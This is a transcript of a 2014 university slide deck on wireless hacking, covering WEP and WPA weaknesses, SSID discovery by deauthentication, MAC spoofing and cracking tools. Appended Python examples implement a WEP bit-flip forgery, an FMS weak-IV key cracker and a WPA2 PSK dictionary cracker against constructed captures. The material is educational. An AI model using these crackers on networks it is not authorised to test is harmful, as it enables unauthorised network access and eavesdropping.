wireless hacking septafiansyah

By : Septafiansyah Dwi Putra ITB

Post on 05-Dec-2014

TRANSCRIPT

  • 1. By : Septafiansyah Dwi Putra ITB
  • 2. Radio Frequency Basics
      • Mobile telephony
      • Cellular Digital Packet Data (CDPD)
      • Private data networks
      • Bluetooth
      • 3G
      • Etc.
  • 3. Immediate communication for the mobile user; two-way, interactive; broadcast medium; convenience; bandwidth limitations; roaming (no fixed location).
  • 4. A wireless LAN (WLAN) is a local area network that uses radio waves as its carrier. The last link to the users is wireless, giving a network connection to all users in a building or campus; the backbone network usually uses cables. Wireless LANs operate in almost the same way as wired LANs, using the same networking protocols and supporting most of the same applications.
  • 5. The wireless LAN connects to a wired LAN, so an access point is needed to bridge wireless LAN traffic into the wired LAN. The access point (AP) can also act as a repeater for wireless nodes, effectively doubling the maximum possible di
  • 6. IEEE 802.11 variants:
      • 802.11a: theoretical maximum of 54 Mbps in the 5 GHz band
      • 802.11b: theoretical maximum of 11 Mbps in the 2.4 GHz band
      • 802.11g: a newer standard with a theoretical maximum of 54 Mbps at 2.4 GHz
  • 7. Wired Equivalent Privacy (WEP): a protocol to protect link-level data during wireless transmission between clients and access points. Services:
      • Authentication: access control to the network, denying access to client stations that fail to authenticate properly.
      • Confidentiality: intended to prevent information compromise by casual eavesdropping.
      • Integrity: intended to prevent messages from being modified in transit between the wireless client and the access point.
  • 8. Means: cryptographic or non-cryptographic. Both are identity-based verification mechanisms: devices request access based on the SSID (Service Set Identifier) of the wireless network.
  • 9. Authentication techniques
  • 10. Cryptographic techniques: WEP uses RC4, a symmetric-key stream cipher, to generate a pseudo-random byte sequence; the stream is XORed with the data to be transmitted. Key sizes: a 40-bit or 104-bit secret key (sold as "64-bit" and "128-bit" because the 24-bit IV is counted in). Unfortunately, attacks have shown that the WEP approach to privacy is vulnerable regardless of key size.
  • 11. Data integrity is "ensured" by an encrypted CRC-32 (Cyclic Redundancy Check) checksum, the ICV. A CRC is linear, not a cryptographic MAC, so this is also vulnerable: an attacker can flip chosen bits in a frame and correct the encrypted ICV without knowing the key.
  • 12. Practical problems with WEP:
      • Security features in wireless products are frequently not enabled.
      • Static WEP keys are used (the same key stays in use for a very long time); WEP provides no key management.
      • Cryptographic keys are short.
      • No user authentication occurs, only devices are authenticated, so a stolen device can access the network.
      • Identity-based systems are vulnerable.
      • Packet integrity is poor.
  • 13. Stronger alternatives and add-ons:
      • 3Com Dynamic Security Link
      • Cisco LEAP (Lightweight Extensible Authentication Protocol; itself later shown vulnerable to offline dictionary attacks)
      • IEEE 802.1X Port-Based Network Access Control with RADIUS authentication support: EAP-MD5, EAP-TLS, EAP-TTLS, PEAP (Protected EAP)
      • TKIP (Temporal Key Integrity Protocol)
      • IEEE 802.11i
  • 14. Platform choice:
      • Windows: wireless NIC drivers are easy to get, but wireless hacking tools are few and weak unless you pay for AirPcap devices or OmniPeek.
      • Linux: wireless NIC drivers are harder to get and install, but the wireless hacking tools are much better.
  • 15. For Linux, the best chipsets to use are Orinoco, Prism2.x/3, Atheros, and Cisco. A good compatibility resource is the MadWifi wiki: http://madwifi-project.org/wiki/Compatibility
  • 16. Terms:
      • Service Set Identifier (SSID): an identifier that distinguishes one access point (network) from another.
      • Initialization Vector (IV): the 24-bit value sent in the clear at the start of every WEP packet. It is prepended to the shared secret key to form the RC4 key that enciphers that packet's data, so anyone sniffing sees which IV each packet used.
  • 17. The SSID can be found in any of these frames:
      • Beacons: sent continually by the access point (unless SSID broadcasting is disabled)
      • Probe Requests: sent by client systems wishing to connect
      • Probe Responses: the access point's answer to a Probe Request
      • Association and Reassociation Requests: made by the client when joining or rejoining the network
      • If SSID broadcasting is off, just send a deauthentication frame to a connected client to force a reassociation, which carries the SSID.
  • 18. MAC address filtering: each MAC must be entered into the list of approved addresses. High administrative effort, low security: an attacker can just sniff MACs from legitimate clients and spoof one of them.
  • 19. In Windows, just select the network from the available wireless networks, click "Set up a wireless network for a home or small office", and then input the SSID.
  • 20. Changing the MAC address in Windows Vista: run regedt32, navigate to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}, locate the adapter's numbered subkey, and set the REG_SZ value NetworkAddress to the new MAC. The SMAC tool is easier.
  • 21. Many Wi-Fi card drivers let you change the MAC from the adapter's properties in Windows Device Manager.
  • 22. Brute-forcing the keyspace takes weeks even for 40-bit keys (e.g. with Cain & Abel). Instead, collect Initialization Vectors, which are sent in the clear, and correlate each with the first encrypted byte: every WEP data frame starts with the known SNAP header byte 0xAA, so the first keystream byte is known for every IV, and the "weak" IVs leak the key one byte at a time (the FMS attack). This makes key recovery far faster than brute force.
  • 23. Tools:
      • Aircrack-ng, or AirSnort (old)
      • Kismet
      • Cain & Abel
      • WLAN-Tools
      • DWEPCrack
      • WEPAttack
      • All of these crack using the weak-IV flaw. Best countermeasure: use WPA/WPA2.
  • 24. This demo is conducted on my home network configuration: Linksys access point, WEP 64-bit key, passcode ???, SSID DIJIANG.
  • 25. WPA/WPA2 is strong: no practical break of the protocol itself was known when this deck was written (2014). However, if you use a weak Pre-Shared Key, it can be found with an offline dictionary attack against one captured 4-way handshake. Tool: Aircrack-ng.
  • 26. Countermeasures: change the default settings; filter MAC addresses (raises the bar only slightly, since MACs can be spoofed); 100% safe = impossible.
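Worked example for slides 10, 11 and 16 (WEP's encrypted CRC-32 "integrity" check). This is an added example, not code from the slides or their author. It models the stream cipher as XOR with an unknown keystream (random bytes stand in for RC4 output; the attack does not depend on which cipher produced the keystream), uses the ICV in WEP's little-endian CRC-32 form, and builds a constructed LLC/SNAP + HTTP frame. The attacker never sees the keystream and still gets a modified frame accepted, because CRC-32 is affine over XOR.

```python
import os
import zlib


def crc32_le(data: bytes) -> bytes:
    """WEP's ICV: CRC-32 of the plaintext, transmitted little-endian."""
    return zlib.crc32(data).to_bytes(4, "little")


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_seal(keystream: bytes, plaintext: bytes) -> bytes:
    """Stream-encrypt plaintext || ICV. Real WEP uses RC4(IV||key) as the keystream;
    the attack below does not care what produced it."""
    return xor(plaintext + crc32_le(plaintext), keystream)


def wep_open(keystream: bytes, ciphertext: bytes):
    """Receiver side: decrypt and check the ICV; return the plaintext, or None on failure."""
    payload = xor(ciphertext, keystream)
    data, icv = payload[:-4], payload[-4:]
    return data if crc32_le(data) == icv else None


def bitflip_attack(ciphertext: bytes, delta: bytes) -> bytes:
    """Turn a valid frame for P into a valid frame for P ^ delta without the key.
    CRC-32 is affine over XOR: crc(P ^ D) == crc(P) ^ crc(D) ^ crc(zeros), so the
    correction crc(D) ^ crc(zeros) can be XORed straight into the encrypted ICV."""
    n = len(ciphertext) - 4
    if len(delta) != n:
        raise ValueError("delta must cover exactly the data part of the frame")
    icv_fix = xor(crc32_le(delta), crc32_le(bytes(n)))
    return xor(ciphertext, delta + icv_fix)


def demo() -> bytes:
    """Constructed frame: LLC/SNAP header plus an HTTP request. The attacker knows
    (or guesses) the plaintext at the bytes to change, rewrites the path, and the
    receiver's ICV check still passes. Returns what the receiver accepts."""
    plaintext = b"\xaa\xaa\x03\x00\x00\x00\x08\x00" + b"GET /admin HTTP/1.0\r\n"
    keystream = os.urandom(len(plaintext) + 4)          # unknown to the attacker
    frame = wep_seal(keystream, plaintext)
    wanted = plaintext.replace(b"admin", b"index")      # same length, so a pure XOR delta
    forged = bitflip_attack(frame, xor(plaintext, wanted))
    return wep_open(keystream, forged)
```

The fix in the 802.11i generation was a keyed MAC (Michael under TKIP, the CCM tag under CCMP) instead of a linear checksum; no ICV correction trick exists against those.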
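Worked example for slides 22 and 23 (weak-IV key recovery, the attack AirSnort, WEPCrack and aircrack-ng automate). This is an added example, not code from the slides, their author, or any of the listed tools. The RC4 and WEP framing are the real algorithms; the 40-bit key and the sniffer output are constructed in-process, and the simulated network emits one frame for every IV of the FMS weak form (A+3, 255, X) so that the run finishes in seconds rather than waiting for a busy network to produce them. The cracker uses only the captured frames and the known first plaintext byte (0xAA).

```python
import zlib

# Every WEP data frame starts with this LLC/SNAP header, so plaintext byte 0 is known.
SNAP_HEADER = b"\xaa\xaa\x03\x00\x00\x00\x08\x00"
WEP_KEY = bytes.fromhex("5EC0DE1337")          # constructed 40-bit ("64-bit") key


def rc4_keystream(key: bytes, n: int) -> bytes:
    s, j = list(range(256)), 0                 # key-scheduling algorithm (KSA)
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0                                  # pseudo-random generation algorithm (PRGA)
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(wep_key: bytes, iv: bytes, data: bytes) -> bytes:
    """Frame body: 3-byte IV in the clear || RC4(IV||key) over data||CRC-32 ICV."""
    payload = data + zlib.crc32(data).to_bytes(4, "little")
    ks = rc4_keystream(iv + wep_key, len(payload))
    return iv + bytes(p ^ k for p, k in zip(payload, ks))


def wep_decrypt(wep_key: bytes, frame: bytes):
    iv, body = frame[:3], frame[3:]
    ks = rc4_keystream(iv + wep_key, len(body))
    payload = bytes(c ^ k for c, k in zip(body, ks))
    data, icv = payload[:-4], payload[-4:]
    return data if zlib.crc32(data).to_bytes(4, "little") == icv else None


def simulate_capture(wep_key: bytes) -> list:
    """Constructed sniffer output: one frame per weak IV (A+3, 255, X) for each key byte A."""
    return [wep_encrypt(wep_key, bytes([a + 3, 255, x]), SNAP_HEADER + b"constructed payload")
            for a in range(len(wep_key)) for x in range(256)]


def fms_votes(frames: list, known: bytes) -> list:
    """Vote for secret key byte A = len(known), given that bytes 0..A-1 are recovered."""
    a = len(known)
    votes = [0] * 256
    for frame in frames:
        iv, ks0 = frame[:3], frame[3] ^ SNAP_HEADER[0]   # known plaintext gives keystream byte 0
        k = iv + known                                   # K[0..A+2] of the RC4 key IV||secret
        s, j = list(range(256)), 0
        for i in range(a + 3):                           # replay the KSA as far as the key is known
            j = (j + s[i] + k[i]) & 0xFF
            s[i], s[j] = s[j], s[i]
        if s[1] < a + 3 and ((s[1] + s[s[1]]) & 0xFF) == a + 3:   # "resolved" state
            # If the rest of the KSA leaves S[0], S[1], S[A+3] alone (about 5% of the
            # time), keystream byte 0 equals the value swapped into S[A+3], which pins j.
            votes[(s.index(ks0) - j - s[a + 3]) & 0xFF] += 1
    return votes


def crack_wep_key(frames: list, key_len: int, fudge: int = 6):
    """Depth-first search over the top `fudge` candidates per byte (aircrack-ng's
    "fudge factor"), confirming a full candidate by checking a captured frame's ICV."""
    def search(prefix: bytes):
        if len(prefix) == key_len:
            return prefix if wep_decrypt(prefix, frames[0]) is not None else None
        votes = fms_votes(frames, prefix)
        for b in sorted(range(256), key=lambda v: -votes[v])[:fudge]:
            found = search(prefix + bytes([b]))
            if found is not None:
                return found
        return None
    return search(b"")


if __name__ == "__main__":
    captured = simulate_capture(WEP_KEY)
    print("recovered:", crack_wep_key(captured, len(WEP_KEY)).hex())
```

About 256 weak IVs per key byte are enough here because the simulation hands the attacker only weak ones; on a real network the tools of that era needed on the order of a million frames to collect the same, which is why the later PTW attack (and aircrack-ng's default mode) matters. Longer keys do not help: the attack recovers each extra byte with the same effort, as slide 10 says.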
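Worked example for slide 25 (why a weak WPA/WPA2 pre-shared key falls to a dictionary attack). This is an added example, not code from the slides or their author. The key derivation is the standard 802.11i one (PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds); PTK via PRF-384; WPA2-CCMP handshake MIC = HMAC-SHA1 truncated to 16 bytes), but the captured handshake is constructed in-process: the SSID is the one from slide 24, while the MAC addresses, nonces, EAPOL frame bytes, passphrase and wordlist are all made up.

```python
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PSK -> PMK: PBKDF2-HMAC-SHA1, 4096 rounds, salted with the SSID (802.11i)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-384 from 802.11i: HMAC-SHA1 over the ordered MACs and nonces. The first
    16 bytes of the PTK are the KCK, the key that authenticates the handshake messages."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    ptk = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(3)
    )
    return ptk[:48]


def eapol_mic(kck: bytes, eapol_with_zeroed_mic: bytes) -> bytes:
    """WPA2 (CCMP) handshake MIC: HMAC-SHA1 truncated to 128 bits."""
    return hmac.new(kck, eapol_with_zeroed_mic, hashlib.sha1).digest()[:16]


def constructed_handshake(passphrase: str) -> dict:
    """Stand-in for what a sniffer hands you: message 2 of the 4-way handshake.
    SSID from the slides; MACs, nonces and frame bytes are constructed."""
    hs = {
        "ssid": "DIJIANG",
        "ap_mac": bytes.fromhex("00195b112233"),
        "sta_mac": bytes.fromhex("001e8c445566"),
        "anonce": hashlib.sha256(b"constructed anonce").digest(),
        "snonce": hashlib.sha256(b"constructed snonce").digest(),
    }
    # Made-up EAPOL-Key frame with the 16-byte MIC field zeroed, as the cracker reconstructs it.
    hs["eapol"] = b"\x01\x03\x00\x75" + b"\x02\x01\x0a" + bytes(8) + hs["snonce"] + bytes(40)
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, hs["ssid"]),
                       hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])[:16]
    hs["mic"] = eapol_mic(kck, hs["eapol"])           # what the station actually sent
    return hs


def crack_psk(hs: dict, wordlist):
    """Offline dictionary attack: derive PMK -> PTK -> MIC for each candidate and
    compare with the captured MIC. PBKDF2 is the only expensive step, which is why
    the tools report candidates per second and why per-SSID PMK tables exist."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, hs["ssid"])
        kck = ptk_from_pmk(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"]), hs["mic"]):
            return candidate
    return None


if __name__ == "__main__":
    captured = constructed_handshake("dijiang2014")     # constructed weak PSK
    print(crack_psk(captured, ["password", "12345678", "dijiang", "dijiang2014"]))
```

Nothing in the handshake is secret apart from the passphrase, so an attacker who captures one handshake (or forces one with a deauthentication frame, as in slide 17) can test candidates offline at whatever rate the hardware allows; only passphrase entropy defends against this. WPA with TKIP differs only in the MIC function (HMAC-MD5).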